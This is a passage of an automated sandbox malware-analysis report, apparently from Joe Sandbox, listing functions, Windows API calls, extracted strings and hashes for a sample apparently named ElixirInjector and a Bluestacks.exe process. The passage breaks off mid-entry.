Opcode Fuzzy Hash: 86df3606b35f8d7cf376e05298d80b3b8f8bb0bf9cc2b66505e2890b40768ed7
Instruction Fuzzy Hash: D191F175608354AFD610DF25D844A2BBBE8FFC9710F00491EF99AD3260DB70A945EF62

Function 00F3B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F3B324

Part of subcall function 00F39097: IsProcessorFeaturePresent.KERNEL32(00000017,00F39086,00000000,00F38D94,00000000,00000000,00000000,00000016,?,?,00F39093,00000000,00000000,00000000,00000000,00000000), ref: 00F39099
Part of subcall function 00F39097: GetCurrentProcess.KERNEL32(C0000417,00F38D94,00000000,?,00000003,00F39868), ref: 00F390BB
Part of subcall function 00F39097: TerminateProcess.KERNEL32(00000000,?,00000003,00F39868), ref: 00F390C2

Strings

*?, xrefs: 00F3B1FB
., xrefs: 00F3B4DB

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: f2dbcc77c520085179743a89d8f7c58e5f82550d66b21d390a9f08a890f3c87a
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: F251C172E0021AEFDF15DFA8CC91AAEBBB5EF48320F244169E954E7300E7759E019B50

Function 00F175DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F175E3

Part of subcall function 00F205DA: _wcslen.LIBCMT ref: 00F205E0

Part of subcall function 00F1A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F1A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F1777F

Part of subcall function 00F1A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F1A325,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A501
Part of subcall function 00F1A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F1A325,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A532

Strings

:, xrefs: 00F17654

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: da514187068ca90299b12700e5959ce10cea06c304986e1a288583789e9cc3d3
Instruction ID: e0514e662aa2f362661149e3256c10ca71557d5439fac4fe3b174888ff4a696d
Opcode Fuzzy Hash: da514187068ca90299b12700e5959ce10cea06c304986e1a288583789e9cc3d3
Instruction Fuzzy Hash: DC418271805258AAEB25EB64DC55EEEB77DAF41300F004096B609A3092DB785FC9EF71

Function 00F2B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F2B4E3
_wcslen.LIBCMT ref: 00F2B4FE

Strings

}, xrefs: 00F2B4D6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 773f878f3799a775ad70284db059fc9639eee3441085d2fe47dea656f0f108f8
Instruction ID: 549a90f22e3087b389b5ae7e1d91622d851ee4c8861e108d58626a4c0cd668db
Opcode Fuzzy Hash: 773f878f3799a775ad70284db059fc9639eee3441085d2fe47dea656f0f108f8
Instruction Fuzzy Hash: F921F372D1432A5AD731EA64EC46F6BB3DCDF81770F08042AFA40C7145EB68DD48A3A2

Function 00F1F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F1F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F1F2E4
Part of subcall function 00F1F2C5: GetProcAddress.KERNEL32(00F581C8,CryptUnprotectMemory), ref: 00F1F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00F1F33E), ref: 00F1F3D2

Strings

CryptUnprotectMemory failed, xrefs: 00F1F3CA
CryptProtectMemory failed, xrefs: 00F1F389

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 443ba1761a8b6a05cfb6f142d9aa668df3ecf43dfa59e13e14c49922cc1eb485
Instruction ID: 28bb8daae45911196fbaf37fac701d32aa36c29f60f38f744025ef6f7c1b9e60
Opcode Fuzzy Hash: 443ba1761a8b6a05cfb6f142d9aa668df3ecf43dfa59e13e14c49922cc1eb485
Instruction Fuzzy Hash: 83115631A01628ABDF159F30DC01AAE3B14FF41770F004126FC22AB291DB749E8AB7D1

Function 00F1B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00F1B9B8

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

Strings

%c:\, xrefs: 00F1B9AE

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 9e77793f8a6f4d9eebb6f3ca73fed0a561d553b8f1b0443a644f30c36243a7e2
Instruction ID: a624b574d8977d2ce24e43ee9ef1dc273a5768ff0f4cfdeac2d467d6a594e78f
Opcode Fuzzy Hash: 9e77793f8a6f4d9eebb6f3ca73fed0a561d553b8f1b0443a644f30c36243a7e2
Instruction Fuzzy Hash: 4801F963904311B5D6346B358C46DABB7ACDE95770B50440EF944D6082EB28D485E2F1

Function 00F11316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00F1E2E8: _swprintf.LIBCMT ref: 00F1E30E
Part of subcall function 00F1E2E8: _strlen.LIBCMT ref: 00F1E32F
Part of subcall function 00F1E2E8: SetDlgItemTextW.USER32(?,00F4E274,?), ref: 00F1E38F
Part of subcall function 00F1E2E8: GetWindowRect.USER32(?,?), ref: 00F1E3C9
Part of subcall function 00F1E2E8: GetClientRect.USER32(?,?), ref: 00F1E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

Strings

0, xrefs: 00F11319

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 59cda247a01e9d616bf27a8e1c5506aec0b5453e910df9ef5f7bfa8d4c98ebbb
Instruction ID: 77f897d3d579c220201b0d3eb9a7af55e83fad1c74bd16a9486a15d3e9b9e1e9
Opcode Fuzzy Hash: 59cda247a01e9d616bf27a8e1c5506aec0b5453e910df9ef5f7bfa8d4c98ebbb
Instruction Fuzzy Hash: C0F0AF3090428CBADF150F618C0DBEA3B99BF00355F048214FE98519E9CBBAC9D4FA10

Function 00F20FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00F21101,?,?,00F2117F,?,?,?,?,?,00F21169), ref: 00F20FEA
GetLastError.KERNEL32(?,?,00F2117F,?,?,?,?,?,00F21169), ref: 00F20FF6

Part of subcall function 00F16C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F16C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F20FFF

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 3f6deae222baf641ddfa7601049820ddba290fc4166f45c9ccbd83293c03c131
Instruction ID: 83622003c8476b05fac198ec4e534bb673cba082052500a1a7b24bbad4ad74b0
Opcode Fuzzy Hash: 3f6deae222baf641ddfa7601049820ddba290fc4166f45c9ccbd83293c03c131
Instruction Fuzzy Hash: 5CD05B7550453476D61037286C06DBE3D14AB73737B500714F939A51E6CA1949C176D6

Function 00F1E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00F1DA55,?), ref: 00F1E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F1DA55,?), ref: 00F1E2B1

Strings

RTL, xrefs: 00F1E2AB

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 0e76a56f673be3e38fbab677b2ea88a57475d19296232edecc9ce8331fd41cfb
Instruction ID: 18686f6492c07962ee9706d23cbf3996fa8d06d25a89d0af27da5199dbee4333
Opcode Fuzzy Hash: 0e76a56f673be3e38fbab677b2ea88a57475d19296232edecc9ce8331fd41cfb
Instruction Fuzzy Hash: A2C0803564075066EB3417787C0DF837E585B11B55F15054CBD41E91D1D6F5C5C0E7E0

Analysis Process: Bluestacks.exePID: 3576, Parent PID: 6192COMMON

Executed Functions

Function 00007FFD34670D48 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFD34670DF3

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: a6050c8cfd260d9cd112d57d63b9ad125e3ba7254d570009c7718e0c7606b8f5
Instruction ID: 0b27a295cb72f3920614f409ca767ff5487f9bddd1215f4838d6fd83f7102efd
Opcode Fuzzy Hash: a6050c8cfd260d9cd112d57d63b9ad125e3ba7254d570009c7718e0c7606b8f5
Instruction Fuzzy Hash: 8791F375A09A998FE78ADF6CC8653A97FE1FB66300F0440BEC04AD73D2DA782411C750

Function 00007FFD34670E43 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29cc63095f39b7e8d72120d2541621ac1a6ef93d26f43b6104a3ca3c6617aa67
Instruction ID: c21e3e8fb59c874f732d5ed6c02a3d5d94612e5f0c2bc082a669e0fd37255c23
Opcode Fuzzy Hash: 29cc63095f39b7e8d72120d2541621ac1a6ef93d26f43b6104a3ca3c6617aa67
Instruction Fuzzy Hash: 3B51DF76B18A998EE799CF5CD8A93B87FE1FBA6314F40417EC04AD33D1CAB914518740

Function 00007FFD34A628D8 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

HYm4, xrefs: 00007FFD34A62A87
, xrefs: 00007FFD34A62952

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID: $HYm4
API String ID: 0-1308994019
Opcode ID: a27fb1347acfcfe7e840743ea4bf538bceb2b494ebadc1e624247dc8916bf772
Instruction ID: 3de1e9cf36e39a80db58dc46da6235c86082a0d96c8477a3a475825e692a9b9f
Opcode Fuzzy Hash: a27fb1347acfcfe7e840743ea4bf538bceb2b494ebadc1e624247dc8916bf772
Instruction Fuzzy Hash: 03516E72E0954A8FDB59EF98D8A15FDB7B1EF59314F60407AD10EE7282CA3C6901CB40

Function 00007FFD34A64EE5 Relevance: 1.9, Strings: 1, Instructions: 699COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD34A65357

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 570973370f2334dc66fa78c27d5b26bfae84f4bf54b9ba81ee0da43c21a1faaa
Instruction ID: a7a4f33c91cdd6287a907c2e09fbad48aa05edcd7e98ce228881681c7785bad8
Opcode Fuzzy Hash: 570973370f2334dc66fa78c27d5b26bfae84f4bf54b9ba81ee0da43c21a1faaa
Instruction Fuzzy Hash: 9C22103061CB094FE798EF18D8A157577E1EF96328B2405BDD58AC7297DA38F8438B81

Function 00007FFD34A6BA18 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34A6BA92

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d95dafa599acf40057185eb25ed9f994693177cc8005e26929fd4bf33931bcf1
Instruction ID: 7fcfb4c113d46465c4124902f8a8577d7e4e4670db94181be66d6239c2ef1682
Opcode Fuzzy Hash: d95dafa599acf40057185eb25ed9f994693177cc8005e26929fd4bf33931bcf1
Instruction Fuzzy Hash: B7516D71E0861A9FDB59DF98C4A05BCB7F0FF5A314F2440BAC10AE7286DA3C6901DB40

Function 00007FFD34670998 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

@4r4, xrefs: 00007FFD3467B035

Memory Dump Source

Source File: 00000005.00000002.3054078458.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34670000_Bluestacks.jbxd

Similarity

API ID:
String ID: @4r4
API String ID: 0-2777621932
Opcode ID: 34cb8fae7a70a4a6b09fff6823b1c6c5bdfa7b6d23dd02c83c5384ee51e01ae5
Instruction ID: 908a39d7253ed8a3f71927b5bc928d2d7ca783e4c7c90818fe0d7e7100315084
Opcode Fuzzy Hash: 34cb8fae7a70a4a6b09fff6823b1c6c5bdfa7b6d23dd02c83c5384ee51e01ae5
Instruction Fuzzy Hash: 4521FB10B189594FEB48FB7C946A6B977D6EB99315F1440BDE50DC33D3DD18AC418281

Function 00007FFD34A699B2 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2c7d9ea02e362e2c5962212ca7e66c4ca0033cebfe7f2bc9a0db48efe616aa
Instruction ID: a1bc95776f17b8376265017e464322d25067527aea898407bb6744aad10dab18
Opcode Fuzzy Hash: cb2c7d9ea02e362e2c5962212ca7e66c4ca0033cebfe7f2bc9a0db48efe616aa
Instruction Fuzzy Hash: BF228430B1CA198FDB98DB08C8A5A79B3E6FF55315B6441B9D14EC7292DA2CAC45CB80

Function 00007FFD34A6BC8F Relevance: .4, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f018de60fb2e8ad3f41e82cc8219c60b4489fc3a57fe20c59980567d3fec65
Instruction ID: e8c0bfcc6c62dce9f0c867b4d902c34d4bcc2fa790c87d4b51497dc25d79750d
Opcode Fuzzy Hash: 22f018de60fb2e8ad3f41e82cc8219c60b4489fc3a57fe20c59980567d3fec65
Instruction Fuzzy Hash: 59F1AE706186568FEB58CF18C4E06B577A1FF46314B6445BDC94ACB28BDA3CF882DB41

Function 00007FFD34A62B4F Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b642e8b748cd38615e71d1dabb157e475573c7f26090f9da029452fb46728d8a
Instruction ID: 38369b29417dd9909d0caf6dce5b76b086b2e7be084ede8bc4df7f0aaad3393b
Opcode Fuzzy Hash: b642e8b748cd38615e71d1dabb157e475573c7f26090f9da029452fb46728d8a
Instruction Fuzzy Hash: 1BE1B231A185568FEB59DF18C4E06B43BA1FF56314F6445BDC94ACB68ACA3CE881CB41

Function 00007FFD34A6CCD1 Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8446a93089af2ad37316352f75539cb0c5064f29ea3b116af0618502c1ef7ae
Instruction ID: 90adb7433f9280b3e150874aebb103f65888706ce9d01f6b064ca9a7157ca5e3
Opcode Fuzzy Hash: e8446a93089af2ad37316352f75539cb0c5064f29ea3b116af0618502c1ef7ae
Instruction Fuzzy Hash: 4AD1AB30A1CB468FE369DA2894E157577E1FF46328B20457EC58FC7682DE2DB8429B81

Function 00007FFD34A63B91 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a5bf6e69d31037c9c4ed566c52d3ff0798e763dec05f0e71a747e528517f09
Instruction ID: 276edef4093b6a4e1cb61063fcc03b1a220fdb9482ac6b7a6c238eff2031c822
Opcode Fuzzy Hash: 92a5bf6e69d31037c9c4ed566c52d3ff0798e763dec05f0e71a747e528517f09
Instruction Fuzzy Hash: CDD1D030A0CA468FE369DB18D4E157577E1FF46328B20497EC68EC76C2DE2DB8469B41

Function 00007FFD34A6BCAF Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb24f5beadf6b90af828973c3e4937fdaa0bc169b16fb54649adc7b4467d478b
Instruction ID: 91a1256a77f8ffa98cb42003af53364a162634f47e630da0e0f0350794b1378b
Opcode Fuzzy Hash: eb24f5beadf6b90af828973c3e4937fdaa0bc169b16fb54649adc7b4467d478b
Instruction Fuzzy Hash: 8BC1AE306185568BEB59CF08C0E05B577A1FF46328B6445BDD94BCB68BCA3CF882DB41

Function 00007FFD34A62B6F Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b8557850e409b2f5a9285f2e31486ab4e7050099c8b6495b65eaf0e134f558
Instruction ID: d59981b89939545acc18ac6c9e5423ff68b5ccb5235c6173bde73ffc8a507c5d
Opcode Fuzzy Hash: 54b8557850e409b2f5a9285f2e31486ab4e7050099c8b6495b65eaf0e134f558
Instruction Fuzzy Hash: 93C1AD31A195468BEB19DF18C0E05B53BA1FF46324B6445BDC94BCB68FCA3CE881DB45

Function 00007FFD34A6B542 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69c5694230be38117f16382d4859b3869a6668b6ff6da4e4062531ec055c569c
Instruction ID: 10abed45096d745880373a3142b6376df5e18d12e9bb5c43fb0aa77169163150
Opcode Fuzzy Hash: 69c5694230be38117f16382d4859b3869a6668b6ff6da4e4062531ec055c569c
Instruction Fuzzy Hash: 5EB1AE70B09A5A9FE749DB28C0B06A4B7E1FF5A314F644179C14EC7A86DB3CB851DB80

Function 00007FFD34A6E1FA Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb82b956b7fc55028fe9f571e9ff78ea8f47b610a9b953cf31a7de49b637b08
Instruction ID: 392ce3172885fbb954fea1e9bfc7142f38a778a45e9cfc75b723359e48a2c7cc
Opcode Fuzzy Hash: 6eb82b956b7fc55028fe9f571e9ff78ea8f47b610a9b953cf31a7de49b637b08
Instruction Fuzzy Hash: C521E512F0D5938AF66496B874F91BE57805F53338F38057ADB9EDA0C2CC0E3845B282

Function 00007FFD34A62402 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3656638774.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_Bluestacks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91e93a82cc5dcdbd167d3475cebe611fc10ab8a9005ff13ad31e4d41683a514
Instruction ID: ecd40df72a80b4ca31f5407a191ef9c50139589c2bfdf4a1bc8f09c9be114c5f
Opcode Fuzzy Hash: e91e93a82cc5dcdbd167d3475cebe611fc10ab8a9005ff13ad31e4d41683a514
Instruction Fuzzy Hash: A4B1A071B09A468FE749EF18C0A06A4B7A1FF5A314F648179C54EC7A86CB3CF851DB80

Function 00007FFD34A68F4D Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

